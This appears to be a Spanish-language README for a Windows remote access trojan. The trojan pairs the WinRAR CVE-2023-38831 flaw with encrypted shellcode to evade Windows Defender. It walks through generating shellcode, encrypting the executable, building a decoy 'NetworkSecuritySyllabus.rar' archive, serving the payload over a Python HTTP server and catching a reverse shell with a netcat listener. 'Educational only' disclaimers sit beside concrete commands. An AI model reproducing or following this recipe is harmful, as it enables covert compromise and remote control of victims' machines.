
Troyano de Acceso Remoto (RAT) para Windows x64 que utiliza una combinación de la vulnerabilidad CVE-2023-38831 (vulnerabilidad de WinRAR < 6.23) y la técnica de explotación Shellcode.
Desarrollar un RAT para Windows x64 utilizando CVE-2023-38831 (WinRAR < 6.23) y explotación de shellcode para evadir Windows Defender.
Advertencia: Esta información es solo para fines educativos. El uso no autorizado de estas técnicas es ilegal y no ético.
Crear Shellcode
51721.py para generar el shellcode inicial.Modificar y Compilar el Shellcode
Cifrar el Ejecutable
decrypt_file.ps1 para cifrar el ejecutable compilado:
.\decrypt_file.ps1 -inputFile .\main.exe -outputFile .\enc_main.exe
Crear un Archivo WinRAR
cve-2023-38831-exp-gen.py para crear el archivo:
python cve-2023-38831-exp-gen.py NetworkSecuritySyllabus.pdf script.bat NetworkSecuritySyllabus.rar
Configurar un Servidor Python para Descarga de Archivos
enc_main.exe y decrypt_file.ps1.python3 -m http.server 8000
Prepararse para Escuchar el Shell TCP Inverso
Esta información se proporciona solo con fines educativos. El uso de este exploit sin permiso explícito es ilegal y no ético. El autor no asume ninguna responsabilidad por el mal uso de esta información.
nc -lnvp 4444
Activar el Shell TCP Inverso